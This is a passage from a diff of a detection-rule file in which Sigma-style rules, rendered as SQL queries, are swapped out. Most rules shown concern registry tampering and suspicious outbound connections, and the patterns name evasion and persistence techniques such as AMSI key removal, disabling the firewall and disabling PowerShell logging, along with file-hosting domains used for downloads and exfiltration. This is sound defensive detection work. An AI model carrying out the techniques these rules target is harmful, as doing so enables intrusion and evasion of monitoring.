Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "title": "Removal Of SD Value to Hide Schedule Task - Registry", + "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" }, { - "title": "Disable Windows Firewall by Registry", - "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "status": "experimental", - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "author": "frack113", + "title": "Removal of Potential COM Hijacking Registry Keys", + "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "status": "test", + "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\') OR (NewProcessName LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_windows_firewall.yml" + "filename": "registry_delete_removal_com_hijacking_registry_key.yml" }, { - "title": "Disable Microsoft Defender Firewall via Registry", - "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", "status": "test", - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_disable_defender_firewall.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "Office Autorun Keys Modification", - "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "test", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((NewProcessName LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_office.yml" + "filename": "net_connection_win_malware_backconnect_ports.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", - "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Activate Suppression of Windows Security Center Notifications", - "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "title": "Microsoft Sync Center Suspicious Network Connections", + "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "status": "experimental", - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "author": "frack113", + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "author": "elhoim", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" ], - "filename": "registry_set_suppress_defender_notifications.yml" + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" }, { - "title": "System Scripts Autorun Keys Modification", - "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown", + "@subTee in your network" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.t1564.001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", - "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "status": "test", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Dllhost Internet Connection", + "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "status": "test", + "description": "Detects Dllhost that communicates with public IP addresses", + "author": "bartblaze", "tags": [ + "attack.defense_evasion", + "attack.t1218", "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1559.001" ], "falsepositives": [ - "Unknown" + "Communication to other corporate systems that use IP addresses from public address spaces" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE 